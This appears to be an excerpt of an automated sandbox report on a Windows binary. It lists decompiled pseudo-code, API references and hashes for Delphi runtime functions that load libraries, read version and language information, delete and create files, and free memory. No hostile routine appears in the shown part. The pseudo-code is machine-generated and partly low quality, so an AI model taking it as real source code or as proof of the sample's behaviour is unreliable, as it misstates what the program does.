                                                                    0x0041ffe2
                                                                    0x00420080
                                                                    0x00420083
                                                                    0x00420086
                                                                    0x00420093
                                                                    0x0041ffe8
                                                                    0x0041ffef
                                                                    0x0041fff4
                                                                    0x0041fff5
                                                                    0x0041fffa
                                                                    0x0041fffd
                                                                    0x00420012
                                                                    0x00420019
                                                                    0x00420041
                                                                    0x0042004a
                                                                    0x0042005b
                                                                    0x0042005d
                                                                    0x0042005d
                                                                    0x00420063
                                                                    0x00420066
                                                                    0x00420069
                                                                    0x00420076
                                                                    0x00420076

                                                                    APIs
                                                                    • GetFileVersionInfoSizeW.VERSION(00000000,?,00000000,00420094), ref: 0041FFD9
                                                                    • GetFileVersionInfoW.VERSION(00000000,?,00000000,?,00000000,00420077,?,00000000,?,00000000,00420094), ref: 00420012
                                                                    • VerQueryValueW.VERSION(?,004200A8,?,?,00000000,?,00000000,?,00000000,00420077,?,00000000,?,00000000,00420094), ref: 0042002C
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.319564629.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000009.00000002.319540262.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319752753.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319806928.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319842191.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319861378.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: FileInfoVersion$QuerySizeValue
                                                                    • String ID:
                                                                    • API String ID: 2179348866-0
                                                                    • Opcode ID: db1b7188df03ba7b3b32e0e3197f16d1bbb1710ebdecda22b0e2c2fca2e7d661
                                                                    • Instruction ID: 087fa93cc02b824bee97242c1a4c1e6fbe52d07f241be95d6751b2a9bfa32856
                                                                    • Opcode Fuzzy Hash: db1b7188df03ba7b3b32e0e3197f16d1bbb1710ebdecda22b0e2c2fca2e7d661
                                                                    • Instruction Fuzzy Hash: 19314771A042199FD710DFA9D941DAFB7F8EB48700B91447AF944E3252D778DD00C765
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040B110, Relevance: 3.1, APIs: 2, Instructions: 93COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 72%
                                                                    			E0040B110(intOrPtr __eax, void* __ebx, signed int __ecx, signed int __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				signed int _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				signed int _t41;
				signed short _t43;
				signed short _t46;
				signed int _t60;
				intOrPtr _t68;
				void* _t79;
				signed int* _t81;
				intOrPtr _t84;

				_t79 = __edi;
				_t61 = __ecx;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(__ebx);
				_push(__esi);
				_t81 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				E00407B04(_v8);
				E00407B04(_v12);
				_push(_t84);
				_push(0x40b227);
				_push( *[fs:eax]);
				 *[fs:eax] = _t84;
				E00407A20(__ecx);
				if(_v12 == 0) {
					L14:
					_pop(_t68);
					 *[fs:eax] = _t68;
					_push(E0040B22E);
					return E00407A80( &_v28, 6);
				}
				E00407E48( &_v20, _v12);
				_t41 = _v12;
				if(_t41 != 0) {
					_t41 =  *(_t41 - 4);
				}
				_t60 = _t41;
				if(_t60 < 1) {
					L7:
					_t43 = E0040AE34(_v8, _t60, _t61,  &_v16, _t81); // executed
					if(_v16 == 0) {
						L00403730();
						E0040A7E4(_t43, _t60,  &_v24, _t79, _t81);
						_t46 = E0040AF60(_v20, _t60, _t81, _v24, _t79, _t81); // executed
						__eflags =  *_t81;
						if( *_t81 == 0) {
							__eflags =  *0x4bdc0c;
							if( *0x4bdc0c == 0) {
								L00403738();
								E0040A7E4(_t46, _t60,  &_v28, _t79, _t81);
								E0040AF60(_v20, _t60, _t81, _v28, _t79, _t81);
							}
						}
						__eflags =  *_t81;
						if(__eflags == 0) {
							E0040B044(_v20, _t60, _t81, __eflags); // executed
						}
					} else {
						E0040AF60(_v20, _t60, _t81, _v16, _t79, _t81);
					}
					goto L14;
				}
				while( *((short*)(_v12 + _t60 * 2 - 2)) != 0x2e) {
					_t60 = _t60 - 1;
					__eflags = _t60;
					if(_t60 != 0) {
						continue;
					}
					goto L7;
				}
				_t61 = _t60;
				E004088AC(_v12, _t60, 1,  &_v20);
				goto L7;
			}

















                                                                    0x0040b110
                                                                    0x0040b110
                                                                    0x0040b113
                                                                    0x0040b115
                                                                    0x0040b117
                                                                    0x0040b119
                                                                    0x0040b11b
                                                                    0x0040b11d
                                                                    0x0040b11f
                                                                    0x0040b120
                                                                    0x0040b121
                                                                    0x0040b123
                                                                    0x0040b126
                                                                    0x0040b12c
                                                                    0x0040b134
                                                                    0x0040b13b
                                                                    0x0040b13c
                                                                    0x0040b141
                                                                    0x0040b144
                                                                    0x0040b149
                                                                    0x0040b152
                                                                    0x0040b20c
                                                                    0x0040b20e
                                                                    0x0040b211
                                                                    0x0040b214
                                                                    0x0040b226
                                                                    0x0040b226
                                                                    0x0040b15e
                                                                    0x0040b163
                                                                    0x0040b168
                                                                    0x0040b16d
                                                                    0x0040b16d
                                                                    0x0040b16f
                                                                    0x0040b174
                                                                    0x0040b19b
                                                                    0x0040b1a1
                                                                    0x0040b1aa
                                                                    0x0040b1bb
                                                                    0x0040b1c3
                                                                    0x0040b1d0
                                                                    0x0040b1d5
                                                                    0x0040b1d8
                                                                    0x0040b1da
                                                                    0x0040b1e1
                                                                    0x0040b1e3
                                                                    0x0040b1eb
                                                                    0x0040b1f8
                                                                    0x0040b1f8
                                                                    0x0040b1e1
                                                                    0x0040b1fd
                                                                    0x0040b200
                                                                    0x0040b207
                                                                    0x0040b207
                                                                    0x0040b1ac
                                                                    0x0040b1b4
                                                                    0x0040b1b4
                                                                    0x00000000
                                                                    0x0040b1aa
                                                                    0x0040b176
                                                                    0x0040b196
                                                                    0x0040b197
                                                                    0x0040b199
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040b199
                                                                    0x0040b185
                                                                    0x0040b18f
                                                                    0x00000000

                                                                    APIs
                                                                    • GetUserDefaultUILanguage.KERNEL32(00000000,0040B227,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0040B2AE,00000000,?,00000105), ref: 0040B1BB
                                                                    • GetSystemDefaultUILanguage.KERNEL32(00000000,0040B227,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,0040B2AE,00000000,?,00000105), ref: 0040B1E3
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.319564629.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000009.00000002.319540262.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319752753.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319806928.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319842191.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319861378.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: DefaultLanguage$SystemUser
                                                                    • String ID:
                                                                    • API String ID: 384301227-0
                                                                    • Opcode ID: 8091743a5a45bbad2069f173d476493d8776fa257b9783c2651a700d4e0e0a8f
                                                                    • Instruction ID: e5bcb09f7540d0846d638ab8db7cc306f2a88a3609992180fc1e837192b0f5a6
                                                                    • Opcode Fuzzy Hash: 8091743a5a45bbad2069f173d476493d8776fa257b9783c2651a700d4e0e0a8f
                                                                    • Instruction Fuzzy Hash: B0313070A142499BDB10EBA5C891AAEB7B5EF48304F50857BE400B73D1DB7CAD41CB9E
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040B234, Relevance: 3.1, APIs: 2, Instructions: 55libraryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 58%
                                                                    			E0040B234(void* __eax, void* __ebx, void* __edi, void* __esi, void* __eflags) {
				char _v8;
				short _v530;
				char _v536;
				char _v540;
				void* _t44;
				intOrPtr _t45;
				void* _t49;
				void* _t52;

				_v536 = 0;
				_v540 = 0;
				_v8 = 0;
				_t49 = __eax;
				_push(_t52);
				_push(0x40b2ee);
				_push( *[fs:eax]);
				 *[fs:eax] = _t52 + 0xfffffde8;
				GetModuleFileNameW(0,  &_v530, 0x105);
				E00408550( &_v536, _t49);
				_push(_v536);
				E0040858C( &_v540, 0x105,  &_v530);
				_pop(_t44); // executed
				E0040B110(_v540, 0,  &_v8, _t44, __edi, _t49); // executed
				if(_v8 != 0) {
					LoadLibraryExW(E004084EC(_v8), 0, 2);
				}
				_pop(_t45);
				 *[fs:eax] = _t45;
				_push(E0040B2F5);
				E00407A80( &_v540, 2);
				return E00407A20( &_v8);
			}











                                                                    0x0040b241
                                                                    0x0040b247
                                                                    0x0040b24d
                                                                    0x0040b250
                                                                    0x0040b254
                                                                    0x0040b255
                                                                    0x0040b25a
                                                                    0x0040b25d
                                                                    0x0040b270
                                                                    0x0040b27d
                                                                    0x0040b288
                                                                    0x0040b29a
                                                                    0x0040b2a8
                                                                    0x0040b2a9
                                                                    0x0040b2b2
                                                                    0x0040b2c1
                                                                    0x0040b2c6
                                                                    0x0040b2ca
                                                                    0x0040b2cd
                                                                    0x0040b2d0
                                                                    0x0040b2e0
                                                                    0x0040b2ed

                                                                    APIs
                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040B2EE,?,?,00000000), ref: 0040B270
                                                                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,0040B2EE,?,?,00000000), ref: 0040B2C1
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.319564629.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000009.00000002.319540262.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319752753.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319806928.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319842191.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319861378.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: FileLibraryLoadModuleName
                                                                    • String ID:
                                                                    • API String ID: 1159719554-0
                                                                    • Opcode ID: c89eb0a175d0b8486c29a163bc28afc1dff8206c8c77fc3926f93841ada109dc
                                                                    • Instruction ID: c66d7809fa1512833e1e01641763b0ecb7dd00f0751393a0e64d94d028879d96
                                                                    • Opcode Fuzzy Hash: c89eb0a175d0b8486c29a163bc28afc1dff8206c8c77fc3926f93841ada109dc
                                                                    • Instruction Fuzzy Hash: 35116070A4421CABDB10EB55CD86BDE77B8DB04304F5144BEE508B32C1DA785F848AA9
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00427154, Relevance: 3.0, APIs: 2, Instructions: 42fileCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 60%
                                                                    			E00427154(void* __eax, void* __edx, void* __eflags) {
				int _v8;
				char _v16;
				long _v20;
				int _t13;
				intOrPtr _t27;
				void* _t32;
				void* _t34;
				intOrPtr _t35;

				_t32 = _t34;
				_t35 = _t34 + 0xfffffff0;
				if(E00427108(__eax,  &_v16) != 0) {
					_push(_t32);
					_push(0x4271b1);
					_push( *[fs:eax]);
					 *[fs:eax] = _t35;
					_t13 = DeleteFileW(E004084EC(__edx)); // executed
					_v8 = _t13;
					_v20 = GetLastError();
					_pop(_t27);
					 *[fs:eax] = _t27;
					_push(E004271B8);
					return E00427144( &_v16);
				} else {
					_v8 = 0;
					return _v8;
				}
			}











                                                                    0x00427155
                                                                    0x00427157
                                                                    0x0042716c
                                                                    0x00427177
                                                                    0x00427178
                                                                    0x0042717d
                                                                    0x00427180
                                                                    0x0042718b
                                                                    0x00427190
                                                                    0x00427198
                                                                    0x0042719d
                                                                    0x004271a0
                                                                    0x004271a3
                                                                    0x004271b0
                                                                    0x0042716e
                                                                    0x00427170
                                                                    0x004271c9
                                                                    0x004271c9

                                                                    APIs
                                                                    • DeleteFileW.KERNEL32(00000000,00000000,004271B1,?,0000000D,00000000), ref: 0042718B
                                                                    • GetLastError.KERNEL32(00000000,00000000,004271B1,?,0000000D,00000000), ref: 00427193
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.319564629.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000009.00000002.319540262.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319752753.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319806928.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319842191.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319861378.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: DeleteErrorFileLast
                                                                    • String ID:
                                                                    • API String ID: 2018770650-0
                                                                    • Opcode ID: 6bce5fda464dbdacec63520f594f5bcb5d9fb2b97579abb83185b4526990ec2d
                                                                    • Instruction ID: b2b9a58b343adce66678156e8009272800f6ed28378062f2bcdc1a6b1bb3db77
                                                                    • Opcode Fuzzy Hash: 6bce5fda464dbdacec63520f594f5bcb5d9fb2b97579abb83185b4526990ec2d
                                                                    • Instruction Fuzzy Hash: 7AF0C831B08228ABDB01EFB5AC424AEB7E8DF0971479149BBE804E3341E6395D209698
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00421230, Relevance: 3.0, APIs: 2, Instructions: 33libraryCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 37%
                                                                    			E00421230(void* __eax, void* __ebx, int __edx) {
				struct HINSTANCE__* _v12;
				int _v16;
				int _t4;
				struct HINSTANCE__* _t9;
				void* _t12;
				intOrPtr _t16;
				void* _t18;
				void* _t19;
				intOrPtr _t20;

				_t18 = _t19;
				_t20 = _t19 + 0xfffffff4;
				_t12 = __eax;
				_t4 = SetErrorMode(__edx); // executed
				_v16 = _t4;
				_push(_t18);
				_push(0x4212a2);
				_push( *[fs:eax]);
				 *[fs:eax] = _t20;
				asm("fnstcw word [ebp-0x2]");
				_push(_t18);
				_push(0x421284);
				_push( *[fs:eax]);
				 *[fs:eax] = _t20;
				_t9 = LoadLibraryW(E004084EC(_t12)); // executed
				_v12 = _t9;
				_pop(_t16);
				 *[fs:eax] = _t16;
				_push(0x42128b);
				asm("fclex");
				asm("fldcw word [ebp-0x2]");
				return 0;
			}












                                                                    0x00421231
                                                                    0x00421233
                                                                    0x00421237
                                                                    0x0042123a
                                                                    0x0042123f
                                                                    0x00421244
                                                                    0x00421245
                                                                    0x0042124a
                                                                    0x0042124d
                                                                    0x00421250
                                                                    0x00421255
                                                                    0x00421256
                                                                    0x0042125b
                                                                    0x0042125e
                                                                    0x00421269
                                                                    0x0042126e
                                                                    0x00421273
                                                                    0x00421276
                                                                    0x00421279
                                                                    0x0042127e
                                                                    0x00421280
                                                                    0x00421283

                                                                    APIs
                                                                    • SetErrorMode.KERNEL32 ref: 0042123A
                                                                    • LoadLibraryW.KERNEL32(00000000,00000000,00421284,?,00000000,004212A2), ref: 00421269
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.319564629.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000009.00000002.319540262.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319752753.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319806928.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319842191.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319861378.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: ErrorLibraryLoadMode
                                                                    • String ID:
                                                                    • API String ID: 2987862817-0
                                                                    • Opcode ID: 5d62b3fe4766baadd73c675683546c7f58e01c4ce11fe1a914dda1a55ed8f36c
                                                                    • Instruction ID: 4174928c950a8c4d8a753a2a73b5e5f46ee32f9a8ef6f103d2b3a03bcfaff51e
                                                                    • Opcode Fuzzy Hash: 5d62b3fe4766baadd73c675683546c7f58e01c4ce11fe1a914dda1a55ed8f36c
                                                                    • Instruction Fuzzy Hash: 15F08270A14744BFDB115F779C5282BBAACE709B047A348BAF800F2691E53C48208574
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004052D4, Relevance: 2.6, APIs: 2, Instructions: 63COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E004052D4() {
				intOrPtr _t13;
				intOrPtr* _t14;
				int _t18;
				intOrPtr* _t23;
				void* _t25;
				void* _t26;
				void* _t28;
				void* _t31;

				_t28 =  *0x004BBADC;
				while(_t28 != 0x4bbad8) {
					_t2 = _t28 + 4; // 0x4bbad8
					VirtualFree(_t28, 0, 0x8000); // executed
					_t28 =  *_t2;
				}
				_t25 = 0x37;
				_t13 = 0x4b7080;
				do {
					 *((intOrPtr*)(_t13 + 0xc)) = _t13;
					 *((intOrPtr*)(_t13 + 8)) = _t13;
					 *((intOrPtr*)(_t13 + 0x10)) = 1;
					 *((intOrPtr*)(_t13 + 0x14)) = 0;
					_t13 = _t13 + 0x20;
					_t25 = _t25 - 1;
				} while (_t25 != 0);
				 *0x4bbad8 = 0x4bbad8;
				 *0x004BBADC = 0x4bbad8;
				_t26 = 0x400;
				_t23 = 0x4bbb78;
				do {
					_t14 = _t23;
					 *_t14 = _t14;
					_t8 = _t14 + 4; // 0x4bbb78
					 *_t8 = _t14;
					_t23 = _t23 + 8;
					_t26 = _t26 - 1;
				} while (_t26 != 0);
				 *0x4bbaf4 = 0;
				E00405884(0x4bbaf8, 0x80);
				_t18 = 0;
				 *0x4bbaf0 = 0;
				_t31 =  *0x004BDB80;
				while(_t31 != 0x4bdb7c) {
					_t10 = _t31 + 4; // 0x4bdb7c
					_t18 = VirtualFree(_t31, 0, 0x8000);
					_t31 =  *_t10;
				}
				 *0x4bdb7c = 0x4bdb7c;
				 *0x004BDB80 = 0x4bdb7c;
				return _t18;
			}











                                                                    0x004052e2
                                                                    0x004052f9
                                                                    0x004052e7
                                                                    0x004052f2
                                                                    0x004052f7
                                                                    0x004052f7
                                                                    0x004052fd
                                                                    0x00405302
                                                                    0x00405307
                                                                    0x00405309
                                                                    0x0040530e
                                                                    0x00405311
                                                                    0x0040531a
                                                                    0x0040531d
                                                                    0x00405320
                                                                    0x00405320
                                                                    0x00405323
                                                                    0x00405325
                                                                    0x00405328
                                                                    0x0040532d
                                                                    0x00405332
                                                                    0x00405332
                                                                    0x00405334
                                                                    0x00405336
                                                                    0x00405336
                                                                    0x00405339
                                                                    0x0040533c
                                                                    0x0040533c
                                                                    0x00405341
                                                                    0x00405352
                                                                    0x00405357
                                                                    0x00405359
                                                                    0x0040535e
                                                                    0x00405375
                                                                    0x00405363
                                                                    0x0040536e
                                                                    0x00405373
                                                                    0x00405373
                                                                    0x00405379
                                                                    0x0040537b
                                                                    0x00405382

                                                                    APIs
                                                                    • VirtualFree.KERNEL32(004BBAD8,00000000,00008000,?,?,?,?,004053D4,0040CB76,00000000,0040CB94), ref: 004052F2
                                                                    • VirtualFree.KERNEL32(004BDB7C,00000000,00008000,004BBAD8,00000000,00008000,?,?,?,?,004053D4,0040CB76,00000000,0040CB94), ref: 0040536E
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.319564629.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000009.00000002.319540262.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319752753.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319806928.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319842191.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319861378.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: FreeVirtual
                                                                    • String ID:
                                                                    • API String ID: 1263568516-0
                                                                    • Opcode ID: 2ac254642d4a9788115c799da738c06d3b344f11962515fad3d8dec7c1c1ac76
                                                                    • Instruction ID: 8dfda0fc8014d777c4f42bdf36328f4fb77b4e1ecbcf9529c7d2d9386e1eba40
                                                                    • Opcode Fuzzy Hash: 2ac254642d4a9788115c799da738c06d3b344f11962515fad3d8dec7c1c1ac76
                                                                    • Instruction Fuzzy Hash: A5116D71A046008FC7689F199840B67BBE4EB88754F15C0BFE549EB791D7B8AC018F9C
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 004232EC, Relevance: 1.5, APIs: 1, Instructions: 28windowCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E004232EC(long __eax, void* __edx) {
				short _v2052;
				signed int _t7;
				void* _t10;
				signed int _t16;
				void* _t17;

				_t10 = __edx;
				_t7 = FormatMessageW(0x3200, 0, __eax, 0,  &_v2052, 0x400, 0); // executed
				while(_t7 > 0) {
					_t16 =  *(_t17 + _t7 * 2 - 2) & 0x0000ffff;
					if(_t16 <= 0x20) {
						L1:
						_t7 = _t7 - 1;
						__eflags = _t7;
						continue;
					} else {
						_t20 = _t16 - 0x2e;
						if(_t16 == 0x2e) {
							goto L1;
						}
					}
					break;
				}
				return E00407BA8(_t10, _t7, _t17, _t20);
			}








                                                                    0x004232f3
                                                                    0x0042330b
                                                                    0x00423313
                                                                    0x00423317
                                                                    0x00423320
                                                                    0x00423312
                                                                    0x00423312
                                                                    0x00423312
                                                                    0x00000000
                                                                    0x00423322
                                                                    0x00423322
                                                                    0x00423326
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00423326
                                                                    0x00000000
                                                                    0x00423320
                                                                    0x00423339

                                                                    APIs
                                                                    • FormatMessageW.KERNEL32(00003200,00000000,00000000,00000000,?,00000400,00000000,00000000,00423C1E,00000000,00423C6F,?,00423E28), ref: 0042330B
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.319564629.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000009.00000002.319540262.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319752753.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319806928.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319842191.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319861378.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: FormatMessage
                                                                    • String ID:
                                                                    • API String ID: 1306739567-0
                                                                    • Opcode ID: 8c28d4cd2feba8420b72e2c8323dac74420019247290cbce7f55a68a80108edc
                                                                    • Instruction ID: 75fedbff241bec6efc8727d26b236f8c34027f11b3bdd8370f626a5f6d270aaf
                                                                    • Opcode Fuzzy Hash: 8c28d4cd2feba8420b72e2c8323dac74420019247290cbce7f55a68a80108edc
                                                                    • Instruction Fuzzy Hash: 89E0D86075432121F624A9052C03B7B2129A7C0B12FE084367A80DE3D5DEADAF55525E
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00422A18, Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 31%
                                                                    			E00422A18(void* __eax, void* __ebx, void* __ecx, void* __eflags) {
				char _v8;
				intOrPtr _t21;
				intOrPtr _t24;

				_push(0);
				_push(_t24);
				_push(0x422a5e);
				_push( *[fs:eax]);
				 *[fs:eax] = _t24;
				E004229AC(__eax, __ecx,  &_v8, __eflags);
				GetFileAttributesW(E004084EC(_v8)); // executed
				_pop(_t21);
				 *[fs:eax] = _t21;
				_push(E00422A65);
				return E00407A20( &_v8);
			}






                                                                    0x00422a1b
                                                                    0x00422a22
                                                                    0x00422a23
                                                                    0x00422a28
                                                                    0x00422a2b
                                                                    0x00422a33
                                                                    0x00422a41
                                                                    0x00422a4a
                                                                    0x00422a4d
                                                                    0x00422a50
                                                                    0x00422a5d

                                                                    APIs
                                                                    • GetFileAttributesW.KERNEL32(00000000,00000000,00422A5E,?,?,00000000,?,00422A71,00422DE2,00000000,00422E27,?,?,00000000,00000000), ref: 00422A41
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.319564629.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000009.00000002.319540262.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319752753.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319806928.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319842191.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319861378.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: AttributesFile
                                                                    • String ID:
                                                                    • API String ID: 3188754299-0
                                                                    • Opcode ID: 8cd9a521966ca01502d57987e2d96a70fbf8ec2bcb71e07358b87aea606a80f7
                                                                    • Instruction ID: ce0c41168f735205187e46b6c3e9294348714fcf51f30dd0002a5427be662740
                                                                    • Opcode Fuzzy Hash: 8cd9a521966ca01502d57987e2d96a70fbf8ec2bcb71e07358b87aea606a80f7
                                                                    • Instruction Fuzzy Hash: D7E09231704308BBD721EB76DE9291AB7ECD788700BA14876B500E7682E6B86E108418
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00423DA8, Relevance: 1.5, APIs: 1, Instructions: 26fileCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E00423DA8(signed int __ecx, void* __edx, signed char _a4, signed char _a8) {
				void* _t17;

				_t17 = CreateFileW(E004084EC(__edx),  *(0x4b92e0 + (_a8 & 0x000000ff) * 4),  *(0x4b92ec + (_a4 & 0x000000ff) * 4), 0,  *(0x4b92fc + (__ecx & 0x000000ff) * 4), 0x80, 0); // executed
				return _t17;
			}




                                                                    0x00423de5
                                                                    0x00423ded

                                                                    APIs
                                                                    • CreateFileW.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 00423DE5
                                                                    Memory Dump Source
                                                                    • Source File: 00000009.00000002.319564629.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000009.00000002.319540262.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319752753.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319806928.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319842191.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 00000009.00000002.319861378.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: CreateFile
                                                                    • String ID:
                                                                    • API String ID: 823142352-0
                                                                    • Opcode ID: dd9159e21b70a0e7bcb8d3c3b5b03a1c2ffc365921e6ade8a7c7864e99aae5ed
                                                                    • Instruction ID: 37fe8146f2431012b4276926014d9d5fd10bf57e8855788e2bc853c5fce69268
                                                                    • Opcode Fuzzy Hash: dd9159e21b70a0e7bcb8d3c3b5b03a1c2ffc365921e6ade8a7c7864e99aae5ed
                                                                    • Instruction Fuzzy Hash: 81E048716441283FD6149ADE7C91F76779C9709754F404563F684D7281C4A59D1086FC
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00409FA8, Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E00409FA8(void* __eax) {
				short _v532;
				void* __ebx;
				void* __esi;
				intOrPtr _t14;
				void* _t16;
				void* _t18;
				void* _t19;
				intOrPtr _t20;
				void* _t21;

				_t16 = __eax;
				_t22 =  *((intOrPtr*)(__eax + 0x10));
				if( *((intOrPtr*)(__eax + 0x10)) == 0) {
					GetModuleFileNameW( *(__eax + 4),  &_v532, 0x20a);
					_t14 = E0040B234(_t21, _t16, _t18, _t19, _t22); // executed
					_t20 = _t14;
					 *((intOrPtr*)(_t16 + 0x10)) = _t20;
					if(_t20 == 0) {
						 *((intOrPtr*)(_t16 + 0x10)) =  *((intOrPtr*)(_t16 + 4));
					}
				}
				return  *((intOrPtr*)(_t16 + 0x10));
			}












                                                                    0x00409fb0
                                                                    0x00409fb2
                                                                    0x00409fb6
                                                                    0x00409fc6
                                                                    0x00409fcf
                                                                    0x00409fd4
                                                                    0x00409fd6
                                                                    0x00409fdb
                                                                    0x00409fe0
                                                                    0x00409fe0
                                                                    0x00409fdb
                                                                    0x00409fee

                                                                    APIs
                                                                    • GetModuleFileNameW.KERNEL32(?,?,0000020A), ref: 00409FC6
                                                                      • Part of subcall function 0040B234: GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040B2EE,?,?,00000000), ref: 0040B270
                                                                      • Part of subcall function 0040B234: LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,0040B2EE,?,?,00000000), ref: 0040B2C1
                                                                    Memory Dump Source
